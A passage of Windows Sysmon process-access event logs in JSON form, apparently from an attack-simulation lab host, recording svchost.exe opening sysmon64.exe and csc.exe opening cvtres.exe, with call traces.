05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4404,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-030E-5F25-0000-00102C740600}\r\nSourceProcessId: 2392\r\nSourceThreadId: 4836\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010A4770600}\r\nTargetProcessId: 4672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-030E-5F25-0000-00102C740600}","SourceProcessId":"2392","SourceThreadId":"4836","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010A4770600}","TargetProcessId":"4672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4405,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4406,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4407,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4408,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4409,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4410,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
